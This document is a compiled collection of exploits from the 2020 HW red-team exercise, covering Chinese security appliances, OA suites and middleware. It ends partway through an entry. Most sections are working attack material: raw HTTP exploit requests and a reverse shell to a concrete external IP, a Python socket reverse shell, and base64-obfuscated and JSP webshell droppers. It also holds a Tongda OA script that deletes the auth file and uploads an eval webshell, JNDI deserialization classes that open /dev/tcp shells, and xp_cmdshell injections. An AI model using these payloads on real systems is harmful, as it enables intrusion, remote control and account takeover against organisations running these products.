    I. Security appliances
        1. Sangfor SSL VPN Nday - Pre-Auth arbitrary password reset
        2. Sangfor SSL VPN Nday - Pre-Auth bound phone number modification
        3. Sangfor SSL VPN remote code execution CNVD-2020-48679
        4. Sangfor SSL VPN arbitrary user addition
        5. Sangfor EDR 3.2.21 remote code execution
        6. Sangfor EDR arbitrary user login CNVD-2020-46552
        7. Sangfor EDR remote command execution
        8. NSFOCUS UTS threat probe: arbitrary admin login / password disclosure
        9. Topsec TOPApp-LB load balancer SQL injection
        10. Topsec DLP system unauthorized admin password change
        11. Leadsec VPN legacy-version vulnerabilities
        12. Qizhi bastion host unauthenticated remote command execution CNVD-2019-20835
        13. Aruba ClearPass remote code execution CVE-2020-7115
        14. PAN-OS remote code execution CVE-2020-2040
        15. Leagsoft NAC file upload
    II. OA
        1. Tongda OA 11.6 unauthenticated remote code execution
        2. Tongda OA 11.4 authorization-bypass login
        3. Tongda OA 11.5 multiple SQL injection vulnerabilities
        4. Tongda OA file inclusion
        5. Yonyou GRP-U8 XXE & SQL injection leading to command execution
        6. Yonyou NC 6.5 deserialization
        7. Seeyon A8 arbitrary file write / file upload
        8. Seeyon A8 deserialization
        9. Weaver e-cology RCE (certain versions)
        10. Weaver Yunqiao (云桥) arbitrary file read
    III. Middleware / containers
        1. WebLogic command execution CVE-2020-14645
        2. WebLogic deserialization CVE-2020-2551
        3. WebLogic deserialization CVE-2020-2555
        4. WebSphere remote code execution CVE-2020-4450
        5. WebSphere remote code execution CVE-2020-4362
        6. WebSphere XXE (XML external entity injection) CVE-2020-4643
        7. Apache Tomcat file inclusion CVE-2020-1938
        8. Apache Tomcat session persistence remote code execution CVE-2020-9484
        9. Nginx with LemonLDAP::NG authorization bypass CVE-2020-24660
    IV. Frameworks
        JAVA:
            1. Spring MVC RFD (reflected file download) CVE-2020-5398
            2. Spring Framework reflected file download CVE-2020-5421
            3. Spring-Cloud-Config-Server directory traversal CVE-2020-5410
            4. Spring Cloud Netflix Hystrix Dashboard SSRF
            5. Apache Cocoon XML injection CVE-2020-11991
            6. Apache Shiro authorization bypass CVE-2020-13933
            7. Apache Shiro authentication bypass CVE-2020-11989
            8. Apache Dubbo remote code execution CVE-2020-11995
            9. Apache Dubbo deserialization CVE-2020-1948
            10. Apache Dubbo deserialization CVE-2019-1756
            11. Struts2 remote code execution CVE-2019-0230
            12. Jackson multiple deserialization vulnerabilities CVE-2020-24616
            13. Fastjson <= 1.2.68 remote command execution
        PHP:
            1. ThinkPHP 3.x injection
            2. ThinkPHP 6 arbitrary file operation
            3. Yii 2 deserialization remote command execution CVE-2020-15148
            4. FastAdmin file upload, severity: high
            5. ThinkAdmin directory traversal / arbitrary file read CVE-2020-25540
    V. Operating systems
        1. Windows Netlogon elevation of privilege CVE-2020-1472
        2. EternalBlue MS17-010
    VI. Databases
        1. redis
        2. hadoop
        3. mysql
        4. Mssql
        5. Nosql
    VII. Mail
        1. Exchange
        2. coremail
    VIII. Project management
        1. 禅道 (ZenTao)
        2. Jira
    Update notes:

    2020 HW Vulnerability Collection

    Still being compiled…

    I. Security appliances

    1. Sangfor SSL VPN Nday - Pre-Auth arbitrary password reset

    Description:
    The VPN's encryption uses a default (hard-coded) RC4 key. An attacker who knows the key can build a valid password-reset packet and change any user's password.
    Key for M7.6.6R1: 20181118
    Key for M7.6.1: 20100720

    Exploitation condition: requires a logged-in account

    # Script for computing RC4_STR / RC4_STR_LEN (Python 3; pip install pycryptodome)
    from Crypto.Cipher import ARC4
    from binascii import a2b_hex, b2a_hex

    def myRC4(data, key):
        # encrypt the plaintext with the default key and return it hex-encoded
        rc41 = ARC4.new(key.encode())
        encrypted = rc41.encrypt(data.encode())
        return b2a_hex(encrypted).decode()

    def rc4_decrpt_hex(data, key):
        # reverse direction: hex ciphertext back to plaintext
        rc41 = ARC4.new(key.encode())
        return rc41.decrypt(a2b_hex(data)).decode()

    key = '20100720'   # M7.6.1 default key; M7.6.6R1 uses 20181118
    data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'
    print(myRC4(data, key))
    POST https://<PATH>/por/changepwd.csp HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    ...
    sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(value computed by the script above)

    Reference: https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?# (password: gf34)

    2. Sangfor SSL VPN Nday - Pre-Auth bound phone number modification

    Description: the phone-number change endpoint does not check authorization properly, so an attacker can overwrite the phone number bound to any user.

    Exploitation condition: requires a logged-in account

    POST https://<PATH>/por/changetelnum.csp?apiversion=1
    Content-Type: application/x-www-form-urlencoded
    ...
    newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sid=0&ip=127.0.0.1

    Reference: https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?# (password: gf34)

    3. Sangfor SSL VPN remote code execution CNVD-2020-48679

    https://www.onebug.org/websafe/98922.html
    https://www.cnblogs.com/potatsoSec/p/12326356.html

    4. Sangfor SSL VPN arbitrary user addition

    5. Sangfor EDR 3.2.21 remote code execution

    EXP
    Note on the request line: the path matches the nginx rule and so passes the first check; the token is the base64 encoding of {"md5":true}, which passes the second check.

    POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1
    Host: 192.168.226.60
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    HTTP_Y_FORWARDED_FOR: 192.168.226.1
    Content-Length: 76
    Content-Type: application/x-www-form-urlencoded
    HTTP_Y_FORWARDED_FOR: 192.168.226.1

    {"params":"w=123\"'1234123'\"|bash -i > /dev/tcp/167.179.118.219/8899 0>&1"}

    Reference: https://www.cnblogs.com/0day-li/p/13650452.html

    6. Sangfor EDR arbitrary user login CNVD-2020-46552

    Affected versions: EDR <= v3.2.19

    POC
    payload: https://ip:xx/ui/login.php?user=<any username>
    https://ip:xx/ui/login.php?user=admin

    7. Sangfor EDR remote command execution

    Affected versions: Sangfor EDR 3.2.16; 3.2.17; 3.2.19

    EXP
    POC:
    https://XXX/tool/log/c.php?strip_slashes=system&limit=whoami
    https://XXX/tool/log/c.php?strip_slashes=system&host=whoami
    https://XXX/tool/log/c.php?strip_slashes=system&path=whoami
    https://XXX/tool/log/c.php?strip_slashes=system&row=whoami

    Reverse shell:
    POST /tool/log/c.php HTTP/1.1
    Host: x.x.x.x
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
    DNT: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Content-Type: application/x-www-form-urlencoded;charset=utf-8
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903
    Content-Length: 256

    strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    8. NSFOCUS UTS threat probe: arbitrary admin login / password disclosure

    Affected versions: UTS < V2.0R00F02SP03

    PoC steps:
    1. Open the login page, submit the username admin with an arbitrary password, and capture the response.
    2. Change the status field in that response from false to true; the response then discloses admin's MD5 password hash.
    3. Put the MD5 value into the password field of the original login request and replay it to log in.

    Reference: https://www.cnblogs.com/0day-li/p/13650550.html

    9. Topsec TOPApp-LB load balancer SQL injection

    POST /acc/clsf/report/datasource.php HTTP/1.1
    Host:xxxx.com
    Connection: close
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    X-Prototype-Version: 1.6.0.3
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 201

    t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=

    10. Topsec DLP system unauthorized admin password change

    Description:

    No login is required. The password-change handler does not verify the old password, and the /?module=auth_user&action=mod_edit_pwd endpoint is reachable without authentication, so any user's password can be changed directly. The default superman account has uid 1.

    POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1
    Cookie: username=superman;

    uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

    Reference: https://www.secpulse.com/archives/140809.html

    Other vulnerabilities: https://blog.csdn.net/Adminxe/article/details/108744908

    11. Leadsec VPN legacy-version vulnerabilities

    12. Qizhi bastion host unauthenticated remote command execution CNVD-2019-20835

    Exploitation: FOFA dork 'body="齐治科技"'; the device is normally reached through a VPN and is not directly exposed to the Internet.
    Exploitation condition: no login required.

    Assume 10.20.10.11 is an attacker-controlled server whose listener/cluster_manage.php contains "<?php echo 'OK'; ?>"
    1. Visit http://10.20.10.11/listener/cluster_manage.php: it returns "OK".
    2. Visit the following link to get a shell. On success a PHP one-liner webshell is written (echo '<?php @eval($_REQUEST[10086]);?>'>>/var/www/shterm/resources/qrcode/lbj77.php)
    https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}
    3. /var/www/shterm/resources/qrcode/lbj77.php, password 10086

    Note: ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK is the base64 encoding of echo '<?php @eval($_REQUEST[10086]);?>'>>/var/www/shterm/resources/qrcode/lbj77.php

    Reportedly there is also another version that is Java-based.
    POST /shterm/listener/tui_update.php

    a=["t';import os;os.popen('whoami')#"]

    Reference: https://www.secpulse.com/archives/140809.html

    Qizhi bastion host command execution CVE-2019-17294

    The service parameter is interpolated into the auditlist command line; the injected `id` runs as the web server user and its output appears in the returned cmdline.

    POST /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1
    Host: ip
    Referer: https://ip/audit/browse.php?year=2019&month=04&day=02&hour=09&minute=40&service=tui
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    DNT: 1
    Connection: keep-alive

    page=1&rp=30&sortname=stamp1&sortorder=desc&query=&qtype=

    HTTP/1.1 200 OK
    Date: Tue, 02 Apr 2019 02:00:57 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    ...
    Content-Type: text/x-json

    {"cmdline": "/usr/libexec/shterm/auditlist all sess -fjson --pagesize=3 --page=1 --t1=2019-04-02 09:40:00 --t2=2019-04-02 09:41:00 --locale=zh_CN --order=-stamp1 --service=uid=48(apache) gid=48(apache) groups=48(apache) --domains 16", "page": 1, "total": 0, "titles": ["tid", "status", "proto", "stamp1", "stamp2", "from_ipaddr", "identity_login", "server_name", "server_ip", "account_remote", "count_cmd", "count_cmd_deny", "count_cmd_kill", "optime", "filesize", "reviewer"], "rows": []}

    13. Aruba ClearPass remote code execution CVE-2020-7115

    https://portswigger.net/daily-swig/critical-aruba-clearpass-rce-vulnerability-exposes-underlying-systems

    14. PAN-OS remote code execution CVE-2020-2040

    15. Leagsoft NAC file upload

    POST /uai/download/uploadfileToPath.htm HTTP/1.1
    HOST: xxxxx
    ... ...

    -----------------------------570xxxxxxxxx6025274xxxxxxxx1
    Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
    Content-Type: image/png

    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/* key = first 16 chars of the MD5 of the connection password; default password rebeyond */session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

    -----------------------------570xxxxxxxxx6025274xxxxxxxx1
    Content-Disposition: form-data; name="uploadpath"

    ../webapps/notifymsg/devreport/
    -----------------------------570xxxxxxxxx6025274xxxxxxxx1--

    Reference: https://blog.csdn.net/m0_48520508/article/details/108790281

    II. OA

    1. Tongda OA 11.6 unauthenticated remote code execution

    Description: deleting Tongda OA's authentication include file (auth.inc.php) bypasses the login check; combined with an arbitrary file upload this gives RCE.
    Affected versions: Tongda OA < v11.5 and v11.6

    import sys
    import requests
    # by Tommy, adapted from the original author, 2020-8-19, Tongda OA 0-day exploit

    version = sys.version_info
    if version < (3, 0):
        print('The current version is not supported, you need to use python3')
        sys.exit()

    def exploit(target):
        try:
            payload = '<?php eval($_POST["admin"]);?>'  # change as needed
            print(target, "[*] Deleting auth.inc.php...")

            # request that deletes auth.inc.php via path traversal in print.php
            url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
            requests.get(url=url, verify=False, timeout=10)
            print(target, "[*] Checking whether the file has been deleted...")
            url = target + "/inc/auth.inc.php"
            page = requests.get(url=url, verify=False, timeout=10).text
            # print(page)
            if 'No input file specified.' not in page:
                print(target, "[-] Could not delete auth.inc.php")
                return 0
            print(target, "[+] auth.inc.php deleted")
            print(target, "[*] Uploading payload...")
            # with auth gone, upload.php accepts the file; repkid traverses out of the upload dir
            url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
            files = {'FILE1': ('admin1.php', payload)}
            requests.post(url=url, files=files, verify=False, timeout=10)
            url = target + "/_admin1.php"
            page = requests.get(url=url, verify=False, timeout=10).text
            if 'No input file specified.' not in page:
                print("[+]************************ File exists, upload succeeded ************************")
                # if '8a8127bc83b94ad01414a7a3ea4b8' in page:  # only confirm if the md5 function ran, to reduce false positives
                print(target, "************************ Code executed, target is vulnerable ************************")
                print(target, "[+] URL:", url)
            else:
                print(target, "[-] File upload failed")
        except Exception as e:
            print(target, e)

    urls = 'url.txt'
    print("[*] Warning: exploiting this vulnerability deletes auth.inc.php, which may break the OA system")
    input("Press Enter to continue")
    for url in open(urls, 'r', encoding='utf-8').read().split('\n'):
        url = url.split()
        if url:  # skip blank lines
            exploit(url[0])

    Reference: https://www.cnblogs.com/wangfuguiblog/p/13712433.html

    2. Tongda OA 11.4 authorization-bypass login

    Note: old vulnerability from 17 April

    import requests

    def poc(url):
        # 11.X: /general/login_code.php , /logincheck_code.php , /general/index.php?isIE=0
        # 2017: /ispirit/login_code.php ,

        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'}
        checkUrl = url + '/general/login_code.php'
        try:
            # request a QR-code login record; the response carries its codeUid
            res = requests.get(checkUrl)
            resText = str(res.text).split('{')
            codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
            # exchange the codeUid for a session as UID 1 (admin) without a password
            getSessUrl = url + '/logincheck_code.php'
            res = requests.post(
                getSessUrl, data={'CODEUID': '{' + codeUid + '}', 'UID': int(1)}, headers=headers)
            print('[+]Get Available COOKIE:' + res.headers['Set-Cookie'])
            headers["Cookie"] = str(res.headers['Set-Cookie'])
            loginUrl = url + '/general/index.php?isIE=0'
            rsp = requests.get(loginUrl, headers=headers)
            if "管理员" in rsp.text and "admin" in rsp.text:
                print('success!')
                return True
            else:
                return False
        except Exception as e:
            return False

    3. Tongda OA 11.5 multiple SQL injection vulnerabilities

    POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: https://www.0-sec.org/portal/home/
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Connection: keep-alive
    Host: www.0-sec.org
    Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 154
    X-WVS-ID: Acunetix-Autologin/65535
    Cache-Control: no-cache
    Accept: */*
    Origin: https://www.0-sec.org
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
    GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org/
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close
    GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close
    GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close
    POST /general/file_folder/swfupload_new.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/
    Connection: close
    Host: 192.168.202.1
    Content-Length: 391
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_ID"

    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_NAME"

    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="FILE_SORT"

    2
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="SORT_ID"

    ------------GFioQpMK0vv2--
    Spaces, tabs, newlines, carriage returns, vertical tabs, etc. are filtered out. Only error-based injection remains practical here, although boolean tests with `and`-style statements still work.

    POST /general/file_folder/api.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 82
    x-wvs-id: Acunetix-Deepscan/209
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8

    CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign
    POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 97
    x-wvs-id: Acunetix-Deepscan/186
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8

    m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--

    Reference: 零组; https://www.cnblogs.com/yuzly/p/13608532.html

    4. Tongda OA file inclusion

    Note: old vulnerability from March

    import requests

    POC = {"P": "7789", "DEST_UID": "1", "UPLOAD_MODE": "2"}

    def poc(url):
        # upload endpoint and file-inclusion endpoint
        uploadUrl = url + "/ispirit/im/upload.php"
        includeUrl = url + "/ispirit/interface/gateway.php"
        # 2017 edition: includeUrl = url + "/mac/gateway.php"
        # content of the uploaded PHP (or other) file goes here
        files = {'ATTACHMENT': "Tongda_Vul_test"}
        # files = {'ATTACHMENT': 'echo("hello")'}
        try:
            uploadRes = requests.post(uploadUrl, data=POC, files=files)
            # path of the uploaded file, parsed from the upload response
            path = uploadRes.text
            path = path[path.find('@') + 1:path.rfind('|')].replace("_", r"\/").replace("|", ".")

            # include the uploaded file through the json parameter (local path)
            includeData = {"json": "{\"url\":\"/general/../../attach/im/" + path + "\"}"}
            includeRes = requests.post(includeUrl, data=includeData)
            if "Tongda_Vul_test" in includeRes.text:
                return True
            else:
                return False
        except Exception as e:
            return False

    5. Yonyou GRP-U8 XXE & SQL injection leading to command execution

    Description: Yonyou GRP-U8 has an XXE vulnerability: the application does not disable external entity loading when parsing XML input, so malicious external files can be loaded. The Data parameter of the AS_DataRequest call is also passed to the database unsanitized, which is what the xp_cmdshell payload below abuses.

    Exploitation condition: no login required

    POST /Proxy HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
    Host: host
    Content-Length: 357
    Connection: Keep-Alive
    Cache-Control: no-cache

    cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

    Reference: https://www.cnblogs.com/yuzly/p/13675224.html

    6. Yonyou NC 6.5 deserialization

    poc.java
    import nc.bs.framework.common.NCLocator;

    import java.util.Properties;

    public class poc {

        // Point the NC client locator at the target's ServiceDispatcherServlet and
        // perform a JNDI lookup of an attacker-controlled name (e.g. an LDAP URL).
        public static void attack(String url, String jndipath) {
            Properties env = new Properties();
            if (!url.startsWith("http")) {
                url = "http://" + url;
            }
            env.put("SERVICEDISPATCH_URL", url + "/ServiceDispatcherServlet");
            NCLocator locator = NCLocator.getInstance(env);
            locator.lookup(jndipath);
        }

        public static void main(String[] args) {
            attack("http://target", "ldap://ip:port/classname");
        }
    }
    remote.java
    import javax.naming.Context;
    import javax.naming.Name;
    import javax.naming.spi.ObjectFactory;
    import java.io.Serializable;
    import java.util.Hashtable;

    // Class served by the attacker's LDAP/HTTP server; the constructor runs on load.
    public class remote implements ObjectFactory, Serializable {

        public remote() {
            try {
                java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "sh -i >& /dev/tcp/ip/port 0>&1"});
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        @Override
        public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
            return null;
        }
    }

    Exploitation via remote deployment using classes that ship with NC

    import nc.bs.framework.common.ComponentMetaVO;
    import nc.bs.framework.rmi.RemoteAddressSelector;
    import nc.bs.framework.rmi.RemoteProxy;

    // Same idea as above, but implementing NC's own RemoteProxy interface so the
    // class is accepted by the framework's remote deployment path.
    public class remote implements RemoteProxy {

        public remote() {
            try {
                java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "sh -i >& /dev/tcp/ip/port 0>&1"});
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        @Override
        public Object getAttribute(String s) {
            return null;
        }

        @Override
        public void setAttribute(String s, Object o) {

        }

        @Override
        public ComponentMetaVO getComponentMetaVO() {
            return null;
        }

        @Override
        public int getRetryMax() {
            return 0;
        }

        @Override
        public void setRetryMax(int i) {

        }

        @Override
        public long getRetryInterval() {
            return 0;
        }

        @Override
        public void setRetryInterval(long l) {

        }

        @Override
        public void setRemoteAddressSelector(RemoteAddressSelector remoteAddressSelector) {

        }

        @Override
        public RemoteAddressSelector getRemoteAddressSelector() {
            return null;
        }
    }

    Reference: https://blog.sari3l.com/posts/608d18f0/ https://xz.aliyun.com/t/8242?page=5

    7. Seeyon A8 arbitrary file write / file upload

    Note: old vulnerability from last year's HW

    import requests

    POC = 'DBSTEP V3.0 354 0 28 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT3brV6\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\nseeyon_A8_arbitrary_upload168f3e4c470b9d72920d3dff7bfa0a0e'

    def poc(url):
        vulUrl = url + "/seeyon/htmlofficeservlet"
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
        }
        try:
            rsp = requests.post(url=vulUrl, data=POC, verify=False, headers=headers, timeout=5)
            if 'BSTEP=OKMLlKlV' in rsp.text:
                # verify the file written by the DBSTEP payload is now reachable
                r = requests.get(url + '/seeyon/test123456.txt')
                if r.status_code == 200:
                    httpResponse = "HTTP Response Status:" + str(r.status_code) \
                        + "\nHTTP Response Headers:" + str(r.headers) \
                        + "\nHTTP Response Body:\n" + str(r.text)

                    return True, httpResponse
            return False
        except Exception as e:
            return False

    8. Seeyon A8 deserialization

    9. Weaver e-cology RCE (certain versions)

    Note: old vulnerability from last year's HW

    import requests

    # BeanShell script executed by the exposed BshServlet; output returned raw
    POC = 'bsh.script=exec("ping");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'

    def poc(url):
        vulUrl = url + "/weaver/bsh.servlet.BshServlet"
        headers = {
            "User-Agent": "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
        }
        try:
            rsp = requests.post(url=vulUrl, data=POC, verify=False, headers=headers, timeout=5)
